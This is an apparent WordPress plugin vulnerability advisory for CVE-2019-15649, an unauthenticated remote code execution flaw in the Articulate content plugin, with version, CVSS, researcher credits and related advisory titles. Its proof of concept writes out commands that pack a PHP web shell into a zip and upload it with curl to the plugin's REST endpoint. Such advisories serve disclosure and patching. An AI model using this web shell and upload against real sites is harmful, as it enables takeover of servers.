Insert or Embed Articulate Content into WordPress < 4.2999 – Unauthenticated RCE | CVE 2019-15649 | Plugin Vulnerabilities

Description

Original issue fixed in 4.2998. However, it was also be possible to upload via articulate_upload_ajax_file() AJAX method which was lacking authorisation checks and has been fixed in 4.2999. Furthermore, the original issue mentioned the need to be authenticated, however it is possible to exploit it as unauthenticated (thx Murilo Caixeta!)

Proof of Concept

Create shell.zip:
echo '<html>poc</html>' > index.html
echo '<?php system($_REQUEST[0];?>' > index.php
zip shell.zip index.html index.php

Execute Curl:
curl -ks --max-time 5 -F "file=@shell.zip" "https://example.com/index.php/wp-json/articulate/v1/upload-data"

Affects Plugins

insert-or-embed-articulate-content-into-wordpress

Fixed in 4.2999

References

CVE

Exploitdb

URL

https://packetstormsecurity.com/files/#153250/

Classification

Type

RCE

OWASP top 10

CWE

CVSS

10.0 (critical)

Miscellaneous

Original Researcher

xulchibalraa, Murilo Caixeta

Verified

Yes

WPVDB ID

c31b4529-5b51-4cc2-bc4e-ba543fa4d4fb

Timeline

Publicly Published

2019-06-11 (about 6 years ago)

Added

2019-07-02 (about 6 years ago)

Last Updated

2023-02-13 (about 3 years ago)

Other

Published

Title

Published

2024-04-25

Title

Customify Site Library <= 0.0.9 - Unauthenticated Remote Code Execution

Published

2024-05-21

Title

Responsive Contact Form Builder & Lead Generation Plugin < 1.9.2 - Authenticated (Subscriber+) Arbitrary Shortcode Execution

Published

2025-09-22

Title

WPCasa < 1.4.2 - Unauthenticated Code Injection

Published

2015-09-30

Title

WordPress Landing Pages 1.8.8-1.9.0 - Unauthenticated Remote Command Execution

Published

2025-05-05

Title

LayoutBoxx <= 0.3.1 - Unauthenticated Arbitrary Shortcode Execution